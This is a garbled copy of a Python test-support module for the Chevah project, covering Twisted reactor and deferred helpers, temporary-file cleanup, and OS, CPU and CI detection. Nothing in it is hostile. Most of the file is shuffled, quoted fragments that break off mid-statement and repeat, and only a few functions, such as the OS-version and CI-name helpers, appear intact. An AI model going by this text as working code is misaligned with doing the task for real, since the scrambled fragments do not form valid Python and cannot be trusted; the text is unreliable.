self._teardown_errors.append(AssertionError( 'There are still active threads,", "the L{Deferred<twisted.internet.defer.Deferred>} has no result, has a success result, or", "print_function from __future__ import division from __future__ import absolute_import from", "protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout", "and active thread. if len(reactor.threadCallQueue) > 0: have_callbacks = True", "is None: return def raise_failure(location, reason): raise AssertionError( 'Reactor is", ") from chevah.compat.testing.filesystem import LocalTestFilesystem # For Python below 2.7", "timeout, debug): \"\"\" Does the actual deferred execution. 
\"\"\" if", "changed from other source. pass reactor.threadCallQueue = [] for delayed_call", "were removed. \"\"\" if not mk.fs.exists(folder_segments): return [] # In", "return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments =", "Mock #: Obsolete. Please use self.patch and self.patchObject. Patch =", "list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second, msg)", "during tests. \"\"\" # Number of second to wait for", "> 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters())) for reader in reactor.getReaders():", "if success_state is None: raise AssertionError('Failed to find \"success\" attribute.')", "= platform.version().split('.') return 'nt-%s.%s' % (parts[0], parts[1]) # We are", "happen if we prevent stop in a previous run. if", "queue', pool_queue) if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool", "chained callbacks. result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout,", "been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on another", "mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor()", "local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP reports", "0: have_callbacks = True continue self._shutdownTestReactor() def executeDelayedCalls(self, timeout=None, debug=False):", "'USERNAME' not in os.environ: os.environ['USERNAME'] = os.environ['USER'] if 'USERNAME' in", "fixtures/cleanup # code which is executed from another thread. #", "for i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break", "= local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: # Windows XP", "account. \"\"\" @classmethod def setUpClass(cls): # FIXME:924: # Disabled when", "and return the failure. Usage:: checker = mk.credentialsChecker() credentials =", "execute.' % timeout) # Check executing all deferred from chained", "mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value()", "when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS = [", "debug=False): \"\"\" Iterate the reactor without stopping it. \"\"\" iterations", "deferred.addErrback(lambda failure: None) def assertIsFailure(self, deferred): \"\"\" Check that deferred", "] # Scheduled event to stop waiting for a deferred.", "'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER']", "iterate using a small delay in steps, # to have", "# Shut up you linter. TestCase else: from unittest import", "does not exists. This should only be called at cleanup", "stop procedure. 
return # Let the reactor know that we", "deferred.addErrback(lambda _: None) self.fail( \"No result expected on %r, found", "reactor.threadCallQueue) if reactor.threadpool and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue)", "= False # Start running has consumed the startup events,", "def _executeDeferred(self, deferred, timeout, debug): \"\"\" Does the actual deferred", "# List of partial thread names to ignore during the", "@staticmethod def patch(*args, **kwargs): \"\"\" Helper for generic patching. \"\"\"", "\"\"\" Clean all test files from folder_segments. Return a list", "temp folder and mark it for cleanup. \"\"\" kwargs['cleanup'] =", "be used by normal tests. \"\"\" if not reactor: return", "state # is changed from other source. pass reactor.threadCallQueue =", "without a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>}", "case for Chevah tests. Checks that temporary folder is clean", "type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments)", "raw_name.split(' ', 1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False):", "AssertionError( 'executeDelayedCalls took more than %s' % (timeout,)) def executeReactorUntil(", "things as we already know that we need # to", "reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: # When running threads", "in steps, # to have a much better debug output.", "'ol']: # Normalize all RHEL variants. distro_name = 'rhel' distro_version", "reactor to wake at an # interval of at most", "= None def tearDown(self): self.callCleanup() self._checkTemporaryFiles() threads = threading.enumerate() if", "enabled with iterate using a small delay in steps, #", "in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True if", "threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue() if pool_queue: raise_failure('threadpoool queue', pool_queue)", "result.append(reactor.threadpool._team._pending.pop()) return result def _threadPoolThreads(self): \"\"\" Return current threads from", "self).setUp() # Initialized only to clean the home folder. test_filesystem", "self._runDeferred(deferred) self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred): raise", "temp which is auto cleaned. \"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)", "Otherwise the debug messages will flood the output. print (", "threadpool does not exists. \"\"\" if not reactor.threadpool: return []", "the test case.''' success_state = None # We search starting", "\"\"\" iterations = [False] * (count - 1) iterations.append(True) self.executeReactorUntil(", "= process_capabilities.cpu_type ci_name = _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE =", "and segments, which is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp(", "CI = _CI_NAMES TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN') # List of", "prevent stop in a previous run. if reactor._started: return reactor._startedBefore", "= reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't start the reactor", "deferred): \"\"\" Ignore the current failure on the deferred. It", "[] when threadpool does not exists. 

def _get_os_version():
    """
    On non-Linux, this is just the os_name.

    On Linux is the distribution name and the version.

    On Windows it is the `nt` followed by the major and minor NT version.
    It is not the marketing name.
    We only support the Windows NT family.
    See: https://en.wikipedia.org/wiki/Windows_NT#Releases

    On OSX it returns `osx` followed by the version.
    It is not the version of the underlying Darwin OS.
    See: https://en.wikipedia.org/wiki/MacOS#Release_history
    """
    if os.name == 'nt':
        parts = platform.version().split('.')
        return 'nt-%s.%s' % (parts[0], parts[1])

    # We are now in Unix zone.
    os_name = os.uname()[0].lower()

    if os_name == 'darwin':
        parts = platform.mac_ver()[0].split('.')
        return 'osx-%s.%s' % (parts[0], parts[1])

    if os_name == 'sunos':
        parts = platform.release().split('.')
        return 'solaris-%s' % (parts[1],)

    if os_name == 'aix':  # noqa:cover
        return 'aix-%s.%s' % (platform.version(), platform.release())

    if os_name != 'linux':
        return process_capabilities.os_name

    # We delay the import as it will call lsb_release.
    import ld
    distro_name = ld.id()

    if distro_name == 'arch':
        # Arch has no version.
        return 'arch'

    if distro_name in ['centos', 'ol']:
        # Normalize all RHEL variants.
        distro_name = 'rhel'

    distro_version = ld.version().split('.', 1)[0]
    return '%s-%s' % (distro_name, distro_version)


def _get_cpu_type():
    """
    Return the CPU type as used in the brink.sh script.
    """
    base = platform.processor()
    if base == 'aarch64':
        return 'arm64'
    if base == 'x86_64':
        return 'x64'
    return base


_CI_NAMES = Bunch(
    LOCAL='local',
    GITHUB='github-actions',
    TRAVIS='travis',
    BUILDBOT='buildbot',
    UNKNOWN='unknown-ci',
    AZURE='azure-pipelines',
    )


def _get_ci_name():
    """
    Return the name of the CI on which the tests are currently executed.
    """
    if os.environ.get('BUILDBOT', '').lower() == 'true':
        return _CI_NAMES.BUILDBOT

    if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':
        return _CI_NAMES.GITHUB

    if os.environ.get('TRAVIS', '').lower() == 'true':
        return _CI_NAMES.TRAVIS

    if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES':
        return _CI_NAMES.AZURE

    if os.environ.get('CI', '').lower() == 'true':
        return _CI_NAMES.UNKNOWN

    return _CI_NAMES.LOCAL
\"\"\" os_administration.addUser(cls.CREATE_TEST_USER) return cls.CREATE_TEST_USER", "# Import reactor last in case some other modules are", "elif not isinstance(result[0], Failure): self.fail( \"Failure result expected on %r,", "= os.environ['USER'] if 'USERNAME' in os.environ and 'USER' not in", "if os.environ.get('CI', '').lower() == 'true': return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class", "mk.fs.exists(folder_segments): return [] # In case we are running the", "file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user =", "this code after upgrading to Twisted 13.0. result = []", "created yet but which will be automatically removed. \"\"\" return", "\"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path = mk.fs.getAbsoluteRealPath('.') segments", "token=cls.os_user.token, ) cls.filesystem = LocalFilesystem(avatar=cls.avatar) @classmethod def tearDownClass(cls): if not", "pass def _raiseReactorTimeoutError(self, timeout): \"\"\" Signal an timeout error while", "a file in the default temp folder and mark it", "_assertReactorIsClean(self): \"\"\" Check that the reactor has no delayed calls,", "you don't have the change to get a \"root\" deferred.", "result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on", "not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder()", "def tempPath(self, prefix='', suffix=''): \"\"\" Return (path, segments) for a", "and len(reactor.threadpool.working) > 0: raise_failure('active threads', reactor.threadCallQueue) pool_queue = self._threadPoolQueue()", "reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls(): try: delayed_call.cancel() except", "Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials)", "setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors", "< (2, 7): from unittest2 import TestCase # Shut up", "reason): raise AssertionError( 'Reactor is not clean. %s: %s' %", "reactor.doIteration(t) else: # FIXME:4428: # When not executed in debug", "the reactor. This will do recursive calls, in case the", "`None` so that the failure will not be raised at", "= Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci', AZURE='azure-pipelines', ) def", "(path, segments) for a path which is not created yet", "result at this point. If the assertion succeeds, then the", "exception or returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes:", "== '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user #", "detects that internal state # is changed from other source.", "instead:\\n%s\" % ( deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0]", "for a path which is not created yet but which", "the end of its callback chain and the last callback", "False reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate", "for a deferred. 
_reactor_timeout_call = None def setUp(self): super(TwistedTestCase, self).setUp()", "None: raise AssertionError('Failed to find \"success\" attribute.') return success def", "temporary folder is clean at exit. \"\"\" os_name = process_capabilities.os_name", "**kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper for patching objects.", "Return the hostname of the current system. \"\"\" return _get_hostname()", "= mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol = protocol protocol.lineReceived('FEAT') self.executeReactor() result =", "for Twisted specific code. Provides support for running deferred and", "self.fail( \"Failure result expected on %r, \" \"found success result", "method, to avoid propagating the error into the reactor. \"\"\"", "for the full thread name excepted_threads = [ 'MainThread', 'threaded_reactor',", "\"\"\" To be called at the end of a stacked", "seconds.. \"\"\" start = time.time() self.executeReactorUntil( lambda _: time.time() -", "result expected on %r, found no result instead\" % (", "opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close() return (path, segments) def", "super(ChevahTestCase, self).assertDictEqual(first, second, msg) first_keys = sorted(first.keys()) second_keys = sorted(second.keys())", "else: temp_avatar = DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = []", "report it, so swallow it in the deferred deferred.addErrback(lambda _:", "don't have the change to get a \"root\" deferred. In", "executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if", "the self.fail below will # report it, so swallow it", "is str while second is unicode for \"%s\".' % (", "we use the separate unittest2 module. # It comes by", "first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def assertDictEqual(self, first,", "if base == 'aarch64': return 'arm64' if base == 'x86_64':", "To not slow down all the tests, we run with", "\"\"\" Check that the reactor has no delayed calls, readers", "timeout is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached:", "file-system tests using a real OS account. \"\"\" @classmethod def", "'USER' in os.environ and 'USERNAME' not in os.environ: os.environ['USERNAME'] =", "= None from chevah.compat import ( DefaultAvatar, LocalFilesystem, process_capabilities, system_users,", "# Check executing all deferred from chained callbacks. result =", "!= 'linux': return process_capabilities.os_name # We delay the import as", "the reactor, waits for deferred execution, raises error in timeout,", "the the exception wrapped by the failure result is not", "', 1)[0] def getDeferredFailure( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\"", "ValueError. # Might be canceled from the separate thread. #", "which the tests are currently executed. 
\"\"\" if os.environ.get('BUILDBOT', '').lower()", "if have_callbacks: break if have_callbacks: continue # Look at threads", "import Deferred from twisted.internet.posixbase import ( _SocketWaker, _UnixWaker, _SIGCHLDWaker )", "platform import socket import sys import time from bunch import", "raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str =", "down all the tests, we run with a very small", "Update to stdlib to make sure we don't compare str", "%s' % (timeout,)) def executeReactorUntil( self, callable, timeout=None, debug=False, prevent_stop=True):", "( deferred, result[0])) def getDeferredResult( self, deferred, timeout=None, debug=False, prevent_stop=False):", "is just the os_name. On Linux is the distribution name", "= [] for check in checks: try: check() except AssertionError", "os_administration.deleteUser(cls.os_user) super(FileSystemTestCase, cls).tearDownClass() @classmethod def setUpTestUser(cls): \"\"\" Set-up OS user", "self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, )", "mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) result = self.getDeferredResult(deferred)", "and the version. On Windows it is the `nt` followed", "callback or errback returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise", "if not result: self.fail( \"Failure result expected on %r, found", "in a previous run. if reactor._started: return reactor._startedBefore = False", "to reactor to wake at an # interval of at", "# For testing we want to force to reactor to", "is None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug)", "will continue to be called and the first failure is", "error if deferred is a Failure. The failed deferred is", "(%s) expected on %r, \" \"found type %r instead: %s\"", "files or folders are present. \"\"\" # FIXME:922: # Move", "= None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local", "'executeDelayedCalls took more than %s' % (timeout,)) def executeReactorUntil( self,", "a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>}", "LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests that", "clean at exit. \"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family", "exists. This should only be called at cleanup as it", "the debug messages will flood the output. print ( u'delayed:", "continue raise_failure('delayed calls', delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False,", "waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>}", "ld.id() if distro_name == 'arch': # Arch has no version.", "AssertionMixin from chevah.compat.testing.mockup import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER,", "patching. 
\"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\"", "reversed(self.__cleanup__): try: function(*args, **kwargs) except Exception as error: # noqa:cover", "self._timeout_reached: # Everything fine, disable timeout. if ( self._reactor_timeout_call and", "and not isinstance(second, text_type) ): # noqa:cover if not msg:", "self._shutdownTestReactor() raise AssertionError('Reactor was not stopped.') # Look at threads", "- 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug, prevent_stop=False,", "EXCEPTED_READERS = [ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event", "print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n'", "deferred in the reactor loop. Starts the reactor, waits for", "and len(reactor.threadpool.working) > 0: have_callbacks = True continue self._shutdownTestReactor() def", "instance of `expected_type` \"\"\" # In Python 2.7 isInstance is", "from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin from chevah.compat.testing.mockup", "cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self):", "\"\"\" Helper for generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod", "not executed in debug mode, some test will fail as", "of a stacked cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager", "were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path =", "t in expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected on", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception types to expect - if", "'beside the main thread: %s - %s' % ( thread_name,", "# In case we are running the test suite as", "return _CI_NAMES.UNKNOWN return _CI_NAMES.LOCAL class ChevahTestCase(TwistedTestCase, AssertionMixin): \"\"\" Test case", "timeout=None, debug=False): \"\"\" Iterate the reactor and stop it at", "super(ChevahTestCase, self).setUp() self.__cleanup__ = [] self._cleanup_stack = [] self._teardown_errors =", "# For Python below 2.7 we use the separate unittest2", "executeReactor(self, timeout=None, debug=False, run_once=False): \"\"\" Run reactor until no more", "from the reactor. This is only for cleanup purpose and", "self._initiateTestReactor(timeout=timeout) self._executeDeferred(deferred, timeout, debug=debug) finally: self._shutdownTestReactor( prevent_stop=prevent_stop) def _executeDeferred(self, deferred,", "not deferred.called: raise AssertionError('This deferred was not called yet.') def", "CREATE_TEST_USER = None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to", "'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ] # We assume that hostname", "self._teardown_errors, None if errors: raise AssertionError('Cleanup errors: %r' % (errors,))", "not a deferred.') if timeout is None: timeout = self.DEFERRED_TIMEOUT", "Failure): self.fail( \"Success result expected on %r, \" \"found failure", "the reactor has no delayed calls, readers or writers. This", "assertWasCalled(self, deferred): \"\"\" Check that deferred was called. \"\"\" if", "is a Failure. The failed deferred is handled by this", "are now in Unix zone. os_name = os.uname()[0].lower() if os_name", "the error. 
\"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test')", "representation of the delayed call. \"\"\" raw_name = text_type(delayed_call.func) raw_name", "return 'solaris-%s' % (parts[1],) if os_name == 'aix': # noqa:cover", "end of test. Only use this for very high level", "'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true': return _CI_NAMES.GITHUB", "%s' % (error)) def _get_os_version(): \"\"\" On non-Linux this is", "a clean reactor at shutdown, only if test # passed.", "end of its callback chain and the last callback or", "== 'posix': import resource return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt':", "_drop_user = '-' def setUp(self): super(ChevahTestCase, self).setUp() self.__cleanup__ = []", "(platform.version(), platform.release()) if os_name != 'linux': return process_capabilities.os_name # We", "AssertionError( 'Deferred took more than %d to execute.' % timeout)", "called at teardown. \"\"\" if reactor is None: return def", "# to restore them. reactor.addSystemEventTrigger( 'during', 'startup', reactor._reallyStartRunning) def _assertReactorIsClean(self):", "return def raise_failure(location, reason): raise AssertionError( 'Reactor is not clean.", "# AttributeError can occur when we do multi-threading. pass def", "# This can happen if we prevent stop in a", "False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception", "self._reactor_timeout_failure = None @property def _caller_success_member(self): \"\"\" Retrieve the 'success'", "debug=debug) def iterateReactorWithStop(self, count=1, timeout=None, debug=False): \"\"\" Iterate the reactor", "SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" # FIXME:1370:", "timeout) # Check executing all deferred from chained callbacks. result", "into result `None` so that the failure will not be", "= self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\" Context manager for stacked", "seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for first_element, second_element", "after upgrading to Twisted 13.0. result = [] deferred.addBoth(result.append) if", "[] def cb(res): result.append(res) return res deferred.addBoth(cb) if result: #", "result. @return: The result of C{deferred}. \"\"\" # FIXME:1370: #", "if have_callbacks: raise AssertionError( 'Reactor queue still contains delayed deferred.\\n'", "= False reactor._started = False reactor._justStopped = False reactor.running =", "with second stack, since first stack is the # current", "to execute.' % timeout) # Check executing all deferred from", "\"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS',", "process_capabilities, system_users, SuperAvatar, ) from chevah.compat.administration import os_administration from chevah.compat.testing.assertion", "by this method, to avoid propagating the error into the", "cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop privileges to", "= True continue # Look at delayed calls. for delayed", "other modules are changing the reactor. 
from twisted.internet import reactor", "it in the deferred deferred.addErrback(lambda _: None) self.fail( \"No result", "**kwargs) except Exception as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ =", "a deferred to have a result. DEFERRED_TIMEOUT = 1 #", "for patching objects. \"\"\" return patch.object(*args, **kwargs) def now(self): \"\"\"", "occur when we do multi-threading. pass def _raiseReactorTimeoutError(self, timeout): \"\"\"", "= LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests", ") from chevah.compat.administration import os_administration from chevah.compat.testing.assertion import AssertionMixin from", "sys.version_info[0:2] < (2, 7): from unittest2 import TestCase # Shut", "is executed from another thread. # removeAll might fail since", "present. \"\"\" #: User will be created before running the", "tests_start = class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return \"%s", "self.assertStartsWith('211-Features:\\n', result) \"\"\" if timeout is None: timeout = self.DEFERRED_TIMEOUT", "removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def tempFile(self, content='',", "mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\"", "the CPU type as used in the brink.sh script. \"\"\"", "run with a very small value. reactor.doIteration(0.000001) def _shutdownTestReactor(self, prevent_stop=False):", "FIXME:922: # Move all filesystem checks into a specialized class", "reactor until no more delayed calls, readers or writers or", "when start using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = []", "Ignore the current failure on the deferred. It transforms an", "getHostname(): \"\"\" Return the hostname of the current system. \"\"\"", "not in target: message = u'%s not in %s.' %", "u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers: %s\\n' u'threadpool size:", "returned a non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the", "'').lower() == 'true': return _CI_NAMES.BUILDBOT if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':", "if ( isinstance(first, text_type) and not isinstance(second, text_type) ): #", "reactor.timeout() # For testing we want to force to reactor", "upgrading to Twisted 13.0. result = [] deferred.addBoth(result.append) if not", "for generic patching. \"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args,", "Chevah project. \"\"\" from __future__ import print_function from __future__ import", "= mk.credentials() deferred = checker.requestAvatarId(credentials) failure = self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure)", "up timeout. self._reactor_timeout_call = reactor.callLater( timeout, self._raiseReactorTimeoutError, timeout) # Don't", "with iterate using a small delay in steps, # to", "or writers. This should only be called at teardown. \"\"\"", "t2 reactor.doIteration(t) else: # FIXME:4428: # When not executed in", "has been called, or that the L{Deferred<twisted.internet.defer.Deferred>} is waiting on", "running the test case and removed on #: teardown. 
CREATE_TEST_USER", "import division from __future__ import absolute_import from six import text_type", "self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\"", "2011 <NAME>. # See LICENSE for details. \"\"\" TestCase used", "reactor.running = False # Start running has consumed the startup", "most 1 second. if t2 is None or t2 >", "# FIXME:1370: # Remove / re-route this code after upgrading", "(repr(source), repr(target)) raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): \"\"\"", "None: timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True", "# We delay the import as it will call lsb_release.", "are temporary files or folders left over.\\n %s' % (", "there is already a failure, the self.fail below will #", "failure into result `None` so that the failure will not", "1: for thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name):", "raise AssertionError(msg.encode('utf-8')) if ( not isinstance(first, text_type) and isinstance(second, text_type)", "= os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def dropPrivileges(cls): '''Drop", "expected_type, value, msg=None): \"\"\" Raise an exception if `value` is", "raise_failure(location, reason): raise AssertionError( 'Reactor is not clean. %s: %s'", "is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix)", "raw_name = raw_name.replace('<bound method ', '') return raw_name.split(' ', 1)[0]", "self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads()) if", "failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error if deferred", "a list of members which were removed. \"\"\" if not", "% (distro_name, distro_version) def _get_cpu_type(): \"\"\" Return the CPU type", "= platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name == 'aix':", "( self._testMethodName, class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs):", "at writers buffers: if len(reactor.getWriters()) > 0: have_callbacks = True", "to force to reactor to wake at an # interval", "AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. # Might be", "deferred): \"\"\" Return the current success result of C{deferred} or", "start the reactor if it is already started. 
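
# A minimal usage sketch (not part of the original module), kept as a
# comment so it does not run at import time. `tempFile` registers its own
# cleanup through `addCleanup`, while `stackedCleanup` scopes any cleanups
# registered inside the `with` block so they run when the block exits
# instead of at tearDown.
#
#     class TempFileTestCase(ChevahTestCase):
#
#         def test_temp_file_content(self):
#             path, segments = self.tempFile(content='some-content')
#             with self.stackedCleanup():
#                 folder_path, folder_segments = self.tempFolder()
#                 # The folder cleanup runs at the end of this block.
#             self.assertTrue(mk.fs.exists(segments))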
# This", "\"\"\" self.assertWasCalled(deferred) if isinstance(deferred.result, Failure): error = deferred.result self.ignoreFailure(deferred) raise", "\"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, ) self.assertIsNotFailure(deferred) return deferred.result", "member from the test case.''' success_state = None # We", "class if self.test_segments: if mk.fs.isFolder(self.test_segments): mk.fs.deleteFolder( self.test_segments, recursive=True) else: mk.fs.deleteFile(self.test_segments)", "from the fixtures/cleanup # code which is executed from another", "self._getDelayedCallName(delayed) is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if excepted_callback", "= [] for delayed in reactor.getDelayedCalls(): # noqa:cover result.append(text_type(delayed.func)) return", "reactor touched from the test # case itself which run", "if test # passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown()", "not supported.') def folderInTemp(self, *args, **kwargs): \"\"\" Create a folder", "not isinstance(second, text_type) ): # noqa:cover if not msg: msg", "_SocketWaker, _UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure except ImportError:", "@classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test files from temporary", "is only for cleanup purpose and should not be used", "When running threads tests the reactor touched from the test", "0: have_callbacks = True continue for reader in reactor.getReaders(): have_callbacks", "= [] def enterCleanup(self): \"\"\" Called when start using stacked", "value, expected_type if not isinstance(value, expected_type): raise AssertionError( \"Expecting type", "% (deferred, result[0])) elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString =", "be called at cleanup as it removes elements from the", "self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside the main", "clean reactor at shutdown, only if test # passed. self.assertIsNone(self._reactor_timeout_failure)", "the underlying Darwin OS. See: https://en.wikipedia.org/wiki/MacOS#Release_history \"\"\" if os.name ==", "manager for stacked cleanups. \"\"\" try: self.enterCleanup() yield finally: self.exitCleanup()", "self._teardown_errors.append(AssertionError( 'There are temporary files or folders left over.\\n %s'", "resource.getrusage(resource.RUSAGE_SELF).ru_maxrss elif cls.os_family == 'nt': from wmi import WMI local_wmi", "= 